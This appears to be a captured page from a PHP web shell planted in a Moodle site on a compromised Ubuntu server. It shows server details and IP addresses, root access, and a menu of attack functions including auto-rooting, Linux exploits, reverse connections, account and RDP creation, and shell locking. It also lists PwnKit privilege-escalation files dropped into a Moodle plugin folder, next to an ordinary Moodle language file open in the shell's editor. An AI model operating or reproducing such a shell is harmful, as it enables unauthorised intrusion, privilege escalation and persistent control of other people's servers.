Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
portfolio /
boxnet /
lang /
en /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
portfolio_boxnet.php
3.18
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : portfolio_boxnet.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Strings for component 'portfolio_boxnet', language 'en', branch 'MOODLE_20_STABLE' * * @package portfolio_boxnet * @copyright 1999 onwards Martin Dougiamas {@link http://moodle.com} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ $string['clientid'] = 'Client ID'; $string['clientsecret'] = 'Client secret'; $string['existingfolder'] = 'Existing folder to put file(s) into'; $string['folderclash'] = 'The folder you asked to create already exists!'; $string['foldercreatefailed'] = 'Failed to create your target folder on Box'; $string['folderlistfailed'] = 'Failed to retrieve a folder listing from Box'; $string['missinghttps'] = 'HTTPS required'; $string['missinghttps_help'] = 'Box will only work with an HTTPS enabled website.'; $string['missingoauthkeys'] = 'Missing client ID and secret'; $string['missingoauthkeys_help'] = 'There is no client ID or secret configured for this plugin. You can get one of these from Box development page.'; $string['newfolder'] = 'New folder to put file(s) into'; $string['noauthtoken'] = 'Could not retrieve an authentication token for use in this session'; $string['notarget'] = 'You must specify either an existing folder or a new folder to upload into'; $string['noticket'] = 'Could not retrieve a ticket from Box to begin the authentication session'; $string['password'] = 'Your Box password (will not be stored)'; $string['pluginname'] = 'Box'; $string['privacy:metadata'] = 'This plugin sends data externally to a linked Box account. It does not store data locally.'; $string['privacy:metadata:data'] = 'Personal data passed through from the portfolio subsystem.'; $string['sendfailed'] = 'Failed to send content to Box: {$a}'; $string['setupinfo'] = 'Setup instructions'; $string['setupinfodetails'] = 'To obtain a client ID and secret, log in to Box and visit the <a href="{$a->servicesurl}">Box developers page</a>. Follow \'Create new application\' and create a new application for your Moodle site. The client ID and secret are displayed in the \'OAuth2 parameters\' section of the application edit form. Optionally, you can also provide other information about your Moodle site.'; $string['sharedfolder'] = 'Shared'; $string['sharefile'] = 'Share this file?'; $string['sharefolder'] = 'Share this new folder?'; $string['targetfolder'] = 'Target folder'; $string['tobecreated'] = 'To be created'; $string['username'] = 'Your Box username (will not be stored)'; $string['warninghttps'] = 'Box requires your website to be using HTTPS in order for the portfolio to work.';
Close